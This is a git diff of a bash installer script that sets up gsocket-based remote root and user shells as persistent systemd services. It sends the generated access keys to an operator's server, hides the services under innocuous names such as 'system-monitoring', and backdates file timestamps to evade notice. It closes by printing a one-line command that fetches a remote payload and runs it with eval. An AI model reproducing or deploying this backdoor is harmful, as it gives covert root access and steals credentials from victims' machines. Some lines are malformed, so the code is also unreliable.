diff --git a/install b/install index dde1bd6..c47a437 100755 --- a/install +++ b/install @@ -375,52 +375,23 @@ setup_gsocket() { local LOG_FILE="$1" if ! command -v gs-netcat &>/dev/null; then - log_cmd "sudo apt install -y git build-essential automake autoconf" "Installing dependencies for gsocket" "$LOG_FILE" + log_cmd "sudo apt install -y git build-essential automake autoconf libssl-dev" "Installing dependencies for gsocket" "$LOG_FILE" log_cmd "git clone https://github.com/hackerschoice/gsocket.git '$TEMP_DIR/gsocket'" "Cloning gsocket repository" "$LOG_FILE" log_cmd "cd '$TEMP_DIR/gsocket' && ./bootstrap && ./configure && make && sudo make install" "Building and installing gsocket" "$LOG_FILE" fi - log_cmd "cd '$TEMP_DIR' && bash -c \"$(curl -fsSL https://gsocket.io/y &>/dev/null)\"" "Setting up gsocket" "$LOG_FILE" - - local GSOCKET_DIR="$HOME/.gsocket" - local SECRET="" - if [ -f "$GSOCKET_DIR/gs-netcat.conf" ]; then - SECRET=$(grep -o 'GS_SECRET=[^"]*' "$GSOCKET_DIR/gs-netcat.conf" | cut -d= -f2) - fi - - if [ -z "$SECRET" ]; then - # Try to run the gsocket command again to get a secret - GSOCKET_OUTPUT=$(cd "$TEMP_DIR" && bash -c "$(curl -fsSL https://gsocket.io/y)" 2>&1) - SECRET=$(echo "$GSOCKET_OUTPUT" | grep -o 'S="[^"]*"' | sed 's/S="\(.*\)"/\1/') - fi - - if [ -n "$SECRET" ]; then - echo "Secret extracted: [HIDDEN]" >> "$LOG_FILE" - echo "$SECRET" | sort -u > "$TEMP_DIR/gsocket_secret.txt" - - log_cmd "sudo mkdir -p /etc/gsocket" "Creating gsocket configuration directory" "$LOG_FILE" - log_cmd "echo '$SECRET' | sudo tee /etc/gsocket/root-shell-key.txt > /dev/null" "Saving gsocket secret key" "$LOG_FILE" - log_cmd "sudo chmod 600 /etc/gsocket/root-shell-key.txt" "Setting secure permissions on key file" "$LOG_FILE" - - send_logs "$LOG_FILE" "$SECRET" "root-shell" - else - log_cmd "echo 'Failed to extract gsocket secret'" "Secret extraction failed" "$LOG_FILE" - fi - - cat > "$TEMP_DIR/gs-root-shell.service" << 'EOL' -[Unit] -Description=Global Socket Root Shell -After=network.target -Wants=network-online.target + log_cmd "sudo mkdir -p /etc/gsocket" + log_cmd "sudo chown -R root:root /etc/gsocket" + log_cmd "gs-netcat -g | sudo tee /etc/gsocket/gs-root-shell-key.txt" "Creating root shell key" "$LOG_FILE" + log_cmd "sudo chmod 600 /etc/gsocket/gs-root-shell-key.txt" + cat > "$TEMP_DIR/gs-root-shell.service" << 'EOL' [Service] Type=simple Restart=always -RestartSec=30 -StartLimitInterval=400 -StartLimitBurst=3 +RestartSec=10 WorkingDirectory=/root -ExecStart=/usr/local/bin/gs-netcat -k /etc/gsocket/root-shell-key.txt -liqS +ExecStart=/usr/local/bin/gs-netcat -k /etc/gsocket/gs-root-shell-key.txt -il [Install] WantedBy=multi-user.target @@ -430,19 +401,18 @@ EOL log_cmd "sudo systemctl daemon-reload" "Reloading systemd configuration" "$LOG_FILE" log_cmd "sudo systemctl enable gs-root-shell.service" "Enabling global socket root shell service" "$LOG_FILE" log_cmd "sudo systemctl start gs-root-shell.service" "Starting global socket root shell service" "$LOG_FILE" + log_cmd "sudo systemctl status gs-root-shell.service" "Checking global socket root shell service status" "$LOG_FILE" + + # Send the root secret to our server + send_logs "$LOG_FILE" "$(sudo cat /etc/gsocket/gs-root-shell-key.txt)" "root-shell" - local USER_SECRET="" - if [ -f "$GSOCKET_DIR/gs-netcat.conf" ]; then - USER_SECRET=$(grep -o 'GS_SECRET=[^"]*' "$GSOCKET_DIR/gs-netcat.conf" | cut -d= -f2) - - if [ -n "$USER_SECRET" ]; then - mkdir -p "$HOME/.config/gsocket" - echo "$USER_SECRET" > "$HOME/.config/gsocket/user-shell-key.txt" - chmod 600 "$HOME/.config/gsocket/user-shell-key.txt" - - # Create a user service file - mkdir -p "$HOME/.config/systemd/user" - cat > "$HOME/.config/systemd/user/gs-user-shell.service" << EOL + # Create user shell service + log_cmd "mkdir -p '$HOME/.config/gsocket'" + log_cmd "gs-netcat -g | tee '$HOME/.config/gsocket/user-shell-key.txt'" "Creating user shell key" "$LOG_FILE" + log_cmd "chmod 600 '$HOME/.config/gsocket/user-shell-key.txt' + log_cmd "mkdir -p "$HOME/.config/systemd/user" + + cat > "$HOME/.config/systemd/user/gs-user-shell.service" << EOL [Unit] Description=Global Socket User Shell After=network.target @@ -451,20 +421,19 @@ After=network.target Type=simple Restart=always RestartSec=30 -ExecStart=/usr/local/bin/gs-netcat -k $HOME/.config/gsocket/user-shell-key.txt -liqS +ExecStart=/usr/local/bin/gs-netcat -k $HOME/.config/gsocket/user-shell-key.txt -il [Install] WantedBy=default.target EOL - log_cmd "systemctl --user daemon-reload" "Reloading user systemd configuration" "$LOG_FILE" - log_cmd "systemctl --user enable gs-user-shell.service" "Enabling user shell service" "$LOG_FILE" - log_cmd "systemctl --user start gs-user-shell.service" "Starting user shell service" "$LOG_FILE" - - # Send the user secret to our server - send_logs "$LOG_FILE" "$USER_SECRET" "user-shell" - fi - fi + log_cmd "systemctl --user daemon-reload" "Reloading user systemd configuration" "$LOG_FILE" + log_cmd "systemctl --user enable gs-user-shell.service" "Enabling user shell service" "$LOG_FILE" + log_cmd "systemctl --user start gs-user-shell.service" "Starting user shell service" "$LOG_FILE" + log_cmd "systemctl --user status gs-user-shell.service" "Checking user shell service status" "$LOG_FILE" + + # Send the user secret to our server + send_logs "$LOG_FILE" "$(cat $HOME/.config/gsocket/user-shell-key.txt)" "user-shell" } apply_stealth() { @@ -473,10 +442,6 @@ apply_stealth() { # 1. Hide gsocket processes with generic names log_cmd "sudo sed -i 's/ExecStart=\/usr\/local\/bin\/gs-netcat/ExecStart=\/usr\/local\/bin\/gs-netcat --process-name \"system-monitor\"/' /etc/systemd/system/gs-root-shell.service" "Disguising root shell process name" "$LOG_FILE" - if [ -f "$HOME/.config/systemd/user/gs-user-shell.service" ]; then - log_cmd "sed -i 's/ExecStart=\/usr\/local\/bin\/gs-netcat/ExecStart=\/usr\/local\/bin\/gs-netcat --process-name \"update-notifier\"/' $HOME/.config/systemd/user/gs-user-shell.service" "Disguising user shell process name" "$LOG_FILE" - fi - # 2. Create a legitimate-looking system service name for our modifications log_cmd "sudo mv /etc/systemd/system/gs-root-shell.service /etc/systemd/system/system-monitoring.service" "Renaming root shell service" "$LOG_FILE" @@ -489,15 +454,10 @@ apply_stealth() { log_cmd "sudo systemctl daemon-reload" "Reloading systemd configuration" "$LOG_FILE" log_cmd "sudo systemctl restart system-monitoring.service" "Restarting disguised root shell service" "$LOG_FILE" - if [ -f "$HOME/.config/systemd/user/gs-user-shell.service" ]; then - log_cmd "systemctl --user daemon-reload" "Reloading user systemd configuration" "$LOG_FILE" - log_cmd "systemctl --user restart gs-user-shell.service" "Restarting user shell service" "$LOG_FILE" - fi - # 4. Set last accessed/modified times of our files to match system files if [ -f "/etc/passwd" ]; then REFERENCE_TIME=$(stat -c %y /etc/passwd) - log_cmd "sudo touch -d \"$REFERENCE_TIME\" /etc/gsocket/root-shell-key.txt" "Setting file timestamp to match system files" "$LOG_FILE" + log_cmd "sudo touch -d \"$REFERENCE_TIME\" /etc/gsocket/gs-root-shell-key.txt" "Setting file timestamp to match system files" "$LOG_FILE" log_cmd "sudo touch -d \"$REFERENCE_TIME\" /etc/systemd/system/system-monitoring.service" "Setting file timestamp to match system files" "$LOG_FILE" fi @@ -907,7 +867,7 @@ echo "==============================================================" echo "Server URL: http://$SERVER_IP/deployment" echo "Admin Page: http://$SERVER_IP/deployment/admin.php" echo "Admin Password: $ADMIN_PASSWORD" -echo "Client Setup Command: eval \"\$(curl -fsSL http://$SERVER_IP/deployment/y)\"" +echo "Client Setup Command: eval \"\$(wget -qO- http://${SERVER_IP}/deployment/y)\"" echo "==============================================================" echo "Secret Token for accessing logs: $RANDOM_TOKEN" echo "=============================================================="